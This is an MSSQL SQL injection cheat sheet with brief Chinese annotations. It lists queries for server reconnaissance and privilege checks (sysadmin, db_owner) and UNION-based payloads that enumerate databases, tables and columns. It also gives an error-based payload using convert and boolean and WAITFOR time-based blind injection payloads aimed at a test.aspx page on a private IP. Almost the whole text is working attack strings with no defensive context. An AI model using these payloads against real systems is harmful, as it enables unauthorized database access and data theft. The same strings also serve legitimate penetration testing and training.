select * from sysobjects;

WAITFOR DELAY '00:00:05';

--
/**/

select @@version;

select @@servername;
select srvname from master.sys.sysservers;

select HOST_NAME();

SELECT USER;
SELECT SESSION_USER;
SELECT USER_NAME();
SELECT name FROM master.sys.sysusers;

IS_SRVROLEMEMBER函数，查服务器权限
- sysadmin
- serveradmin
- securityadmin
- processadmin
- setupadmin
- bulkadmin
- diskadmin
- dbcreator
- public

IS_ROLEMEMBER函数，查数据库权限
- db_owner
- db_securityadmin
- db_accessadmin
- db_backupoperator
- db_ddladmin
- db_datawriter
- db_datareader
- db_denydatawriter

select * from tbl where id = 0 union select 1, 'xxx', 'yyy';

select * from tbl where id = 0 union select NULL, NULL, 'yyy';

select * from tbl where id =0 union select NULL, NULL, DB_NAME();

select * from tbl where id =0 union select NULL, NULL, DB_NAME(0);

select * from tbl where id = 0 union select NULL, NULL, quotename(name) from master.dbo.sysdatabases;

select * from tbl where id =0 union select NULL, NULL, quotename(name) from 数据库名.dbo.sysobjects where xtype = 'u'--

0 union select NULL, NULL,quotename(name) from 数据库名.dbo.syscolumns where id = (select id from 数据库名.dbo.sysobjects where name = '指定表')--

0 union select NULL, NULL, id from sysobjects where name = '表名'--

0 union select NULL, NULL, quotename(name) from syscolumns where id=上面的id--

0 union select quotename(列名) from 表--

0' or 1=convert(int, @@version);

http://192.168.20.155/test.aspx?id=1 and ascii(substring((select quotename(name) from master.dbo.sysdatabases),1,1)) < 109

http://192.168.20.155/test.aspx?id=1;if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

http://192.168.20.155/test.aspx?id=1;if (ascii(substring((select quotename(name) from master.dbo.sysdatabases),1,1)))<50 WAITFOR DELAY '0:0:5'--

id=1 if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and len(name)=9)=1) WAITFOR DELAY '0:0:5'--